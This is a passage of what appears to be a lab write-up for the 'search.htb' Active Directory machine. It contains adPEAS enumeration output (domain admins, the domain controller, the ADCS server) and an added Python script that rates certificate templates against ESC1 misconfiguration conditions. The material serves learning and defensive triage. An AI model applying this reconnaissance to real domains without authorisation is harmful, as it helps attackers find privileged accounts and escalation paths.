userPrincipalName:			Tristan.Davies@search.htb
distinguishedName:			CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-1298
memberOf:				CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
					CN=Domain Admins,CN=Users,DC=search,DC=htb
					CN=Enterprise Admins,CN=Users,DC=search,DC=htb
					CN=Schema Admins,CN=Users,DC=search,DC=htb
					CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description:			The only Domain Admin allowed, Administrator will soon be disabled
pwdLastSet:				01/31/2024 10:08:55
lastLogonTimestamp:			01/31/2024 10:12:00
userAccountControl:			NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount:				This identity is or was member of a high privileged admin group
 
sAMAccountName:				Administrator
distinguishedName:			CN=Administrator,CN=Users,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-500
memberOf:				CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
					CN=Domain Admins,CN=Users,DC=search,DC=htb
					CN=Enterprise Admins,CN=Users,DC=search,DC=htb
					CN=Schema Admins,CN=Users,DC=search,DC=htb
					CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description:			Built-in account for administering the computer/domain
pwdLastSet:				04/14/2020 14:38:29
lastLogonTimestamp:			01/30/2024 09:08:40
userAccountControl:			NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount:				This identity is or was member of a high privileged admin group
 
[+] Found members in group 'BUILTIN\Access Control Assistance Operators':
GroupName:				London-ITSec
distinguishedName:			CN=London-ITSec,OU=Groups,OU=London,OU=Sites,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-1105
 
GroupName:				Manchester-ITSec
distinguishedName:			CN=Manchester-ITSec,OU=Groups,OU=Manchester,OU=Sites,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-1107
 
GroupName:				Sheffield-ITSec
distinguishedName:			CN=Sheffield-ITSec,OU=Groups,OU=Sheffield,OU=Sites,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-1110
 
GroupName:				Birmingham-ITSec
distinguishedName:			CN=Birmingham-ITSec,OU=Groups,OU=Birmingham,OU=Sites,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-1106
 
GroupName:				Glasgow-ITSec
distinguishedName:			CN=Glasgow-ITSec,OU=Glasgow,OU=Sites,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-1108
 
GroupName:				ITSec
distinguishedName:			CN=ITSec,OU=Sites,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-1295
 
[+] Found members in group 'SEARCH\Cert Publishers':
sAMAccountName:				RESEARCH$
distinguishedName:			CN=RESEARCH,OU=Domain Controllers,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-1001
operatingsystem:			Windows Server 2019 Standard
memberOf:				CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=search,DC=htb
					CN=Cert Publishers,CN=Users,DC=search,DC=htb
pwdLastSet:				01/30/2024 09:08:03
lastLogonTimestamp:			01/30/2024 09:08:33
[+] userAccountControl:			SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
 
 
[?] +++++ Searching for High Privileged Users with a password older 5 years +++++
 
[?] +++++ Searching for High Privileged User which may not require a Password +++++
 
[?] +++++ Starting Computer Enumeration +++++
 
[?] +++++ Searching for Domain Controllers +++++
[+] Found Domain Controller 'RESEARCH$':
sAMAccountName:				RESEARCH$
distinguishedName:			CN=RESEARCH,OU=Domain Controllers,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-1001
operatingsystem:			Windows Server 2019 Standard
memberOf:				CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=search,DC=htb
					CN=Cert Publishers,CN=Users,DC=search,DC=htb
pwdLastSet:				01/30/2024 09:08:03
lastLogonTimestamp:			01/30/2024 09:08:33
[+] userAccountControl:			SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
 
 
[?] +++++ Searching for Exchange Servers +++++
 
[?] +++++ Searching for ADCS Servers +++++
[+] Found ADCS Server 'RESEARCH$':
sAMAccountName:				RESEARCH$
distinguishedName:			CN=RESEARCH,OU=Domain Controllers,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-1001
operatingsystem:			Windows Server 2019 Standard
memberOf:				CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=search,DC=htb
					CN=Cert Publishers,CN=Users,DC=search,DC=htb
pwdLastSet:				01/30/2024 09:08:03
lastLogonTimestamp:			01/30/2024 09:08:33
[+] userAccountControl:			SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
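adPEAS flags ENROLLEE_SUPPLIES_SUBJECT on the WebServers, WebServer and SubCA templates but, as its own banner says, does only basic enumeration. As an added example that is not part of this writeup or of adPEAS, the Python below parses the template sections of the output above (a trimmed excerpt embedded as a string, plus one constructed template named ConstructedESC1 that does not exist in this domain) and applies the ESC1 conditions from the Certified Pre-Owned paper adPEAS links to: requester-supplied subject, a client-authentication-capable or absent EKU, low-privileged enrollment rights, and no manager approval. The severity labels and the principal and EKU lists are assumptions made for this example.

```python
"""Triage adPEAS certificate-template output against the ESC1 conditions.

Added example, not from the original writeup or from adPEAS.  ADPEAS_EXCERPT is
a trimmed copy of the template sections printed above plus one constructed
template (ConstructedESC1) that does not exist in the page's domain.
"""
import re

SECTION_RX = re.compile(r"^\[\?\] \+{5} Checking Template '([^']+)' \+{5}$")
KV_RX = re.compile(r"^(?:\[[!+]\]\s*)?([A-Za-z][A-Za-z ]*?):\s+(.*)$")  # optional [!]/[+] marker
CONT_RX = re.compile(r"^\s+(\S.*)$")                                    # indented continuation line
LIST_KEYS = {"Extended Key Usage", "EnrollmentFlag", "CertificateNameFlag", "Enrollment allowed for"}

ADPEAS_EXCERPT = r"""
[?] +++++ Checking Template 'ITSecOps' +++++
[+] Identity 'SEARCH\ITSec' has enrollment rights for template 'ITSecOps'
[+] Identity 'SEARCH\Domain Users' has enrollment rights for template 'ITSecOps'
Template Name:                ITSecOps
[+] Extended Key Usage:       Client Authentication
EnrollmentFlag:               INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
CertificateNameFlag:          SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
[+] Enrollment allowed for:   SEARCH\ITSec
                              SEARCH\Domain Users

[?] +++++ Checking Template 'WebServers' +++++
[!] Template 'WebServers' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name:                WebServers
Extended Key Usage:           Server Authentication
EnrollmentFlag:               0
[!] CertificateNameFlag:      ENROLLEE_SUPPLIES_SUBJECT

[?] +++++ Checking Template 'SubCA' +++++
[!] Template 'SubCA' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name:                SubCA
EnrollmentFlag:               0
[!] CertificateNameFlag:      ENROLLEE_SUPPLIES_SUBJECT

[?] +++++ Checking Template 'ConstructedESC1' +++++
Template Name:                ConstructedESC1
Extended Key Usage:           Client Authentication
EnrollmentFlag:               0
[!] CertificateNameFlag:      ENROLLEE_SUPPLIES_SUBJECT
[+] Enrollment allowed for:   EXAMPLE\Domain Users
"""


def parse_templates(text):
    """Map template name -> attributes.  List-valued keys are split on ',' and extended
    from indented continuation lines; keys adPEAS marked with [!] are recorded in 'flagged'."""
    templates, cur, last_key = {}, None, None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = SECTION_RX.match(line)
        if m:
            cur = templates.setdefault(m.group(1), {"flagged": []})
            last_key = None
            continue
        if cur is None or not line.strip():
            continue
        m = KV_RX.match(line)
        if m:
            key, val = m.group(1).strip(), m.group(2).strip()
            cur[key] = [v.strip() for v in val.split(",")] if key in LIST_KEYS else val
            if line.startswith("[!]"):
                cur["flagged"].append(key)
            last_key = key
            continue
        m = CONT_RX.match(line)
        if m and last_key in LIST_KEYS:
            cur[last_key].append(m.group(1).strip())
    return templates


# Assumed lists for this example.
LOW_PRIV = {"domain users", "domain computers", "authenticated users", "everyone"}
AUTH_EKUS = {"client authentication", "smart card logon", "pkinit client authentication", "any purpose"}


def assess_template(t):
    """Return (severity, reasons) from the ESC1 conditions visible in adPEAS output."""
    ekus = [e.lower() for e in t.get("Extended Key Usage", [])]
    enrollers = [p.lower().split("\\")[-1] for p in t.get("Enrollment allowed for", [])]
    supplies_subject = "ENROLLEE_SUPPLIES_SUBJECT" in t.get("CertificateNameFlag", [])
    needs_approval = "PEND_ALL_REQUESTS" in t.get("EnrollmentFlag", [])
    auth_capable = not ekus or bool(set(ekus) & AUTH_EKUS)   # no EKU means any purpose
    low_priv = bool(set(enrollers) & LOW_PRIV)
    reasons = []
    if supplies_subject:
        reasons.append("requester chooses the subject/SAN")
    if auth_capable:
        reasons.append("no EKU: usable for any purpose" if not ekus else "client-authentication EKU")
    if low_priv:
        reasons.append("low-privileged principals can enrol")
    if supplies_subject and auth_capable and low_priv and not needs_approval:
        return "high", reasons      # every ESC1 condition is visible in the output
    if supplies_subject:
        return "review", reasons    # adPEAS printed no enrolment rights; confirm the ACL with Certify/Certipy
    if auth_capable and low_priv:
        return "low", reasons       # normal for User-style templates, still worth inventorying
    return "info", reasons


def triage(text):
    return {name: assess_template(t) for name, t in parse_templates(text).items()}


if __name__ == "__main__":
    for name, (sev, why) in triage(ADPEAS_EXCERPT).items():
        print(f"{sev:6} {name}: {'; '.join(why)}")
```

For this domain the result is "review" rather than "high" for WebServers and SubCA: the subject is requester-controlled, but adPEAS shows no enrollment rights for them and the EKU on WebServers is Server Authentication only, so whether a low-privileged user can actually request a logon-capable certificate has to be confirmed with the fuller tooling adPEAS points at. ITSecOps and User rate "low" because Domain Users can enroll for client-authentication certificates, which is expected, but the CA's NTAuthCertificates=True line means any such certificate is accepted for domain logon and the templates deserve a place in the inventory.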